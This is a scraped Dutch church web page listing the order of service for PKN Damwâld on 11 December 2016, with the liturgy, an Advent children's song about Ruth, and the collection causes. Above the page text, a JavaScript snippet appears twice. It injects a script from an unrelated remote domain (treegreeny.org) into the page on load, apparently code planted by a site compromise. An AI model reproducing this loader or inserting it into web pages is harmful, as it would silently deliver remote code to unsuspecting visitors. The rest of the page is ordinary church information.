;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 december 2016 9:30 uur - PKN Damwâld
zondag 11 december 2016
09:30 uur
3e Advent / KingKids kerstproject

Kerkdienst zondag 11 december 2016 9:30 uur

vg_-01

Informatie

Voorganger:Ds. W.J. van Dijk, Surhuisterveen
Organist:Ivo van Hijum
Mededeling:3e Advent / KingKids kerstproject
Liturgie
Lied voor de dienst gezang 118: 1,2
Welkom en mededelingen
Aanvangslied psalm 43: 3,4,5
Stilgebed Votum en Groet
Aansteken 3e adventskaars
Jezus verwachten
maakt ons blij,
kijk maar, drie lichtjes
op een rij.
We zingen: ELB 454:1,2,3
Gebed om Gods Geest .
Adventsproject
BELOFTE VAN BESCHERMING

Ruth kwam ooit van Moab naar Bethlehem,
zij volgde Naomi, maar ook God de HEER.
Hij leidde haar en beschermde steeds weer,
en zij hoorde naar Zijn stem.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

Ruth trouwde Boaz de landeigenaar,
God maakt Zijn belofte voor Israël waar.
Zij kreeg daardoor een plaats in de rij
en ook David hoort daarbij.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.
( de kinderen gaan naar het Skûlplak )
We lezen: Lukas 1: 57-80
We zingen: gezang 67: 1,2,3
Prediking
We zingen: gezang 475: 1,2,3
Dankgebed en voorbede .
Collecte
Slotlied gezang 124: 1,2,3,4,5
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Damwoude-India

De Stichting Karunai Jeevan stelt zich ten doel om een weeshuis in Chengalpattu, Zuid India financieel te ondersteunen. In dit weeshuis wonen kinderen die anders op straat leven. De kinderen krijgen te eten en onderwijs. Sinds 2007 is er een Nederlandse vertegenwoordiging van de Stichting Karunai Jeevan, de Stichting Damwoude-India, opgericht door Wendy van der Velde-Kuperus en Ale Flootman.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds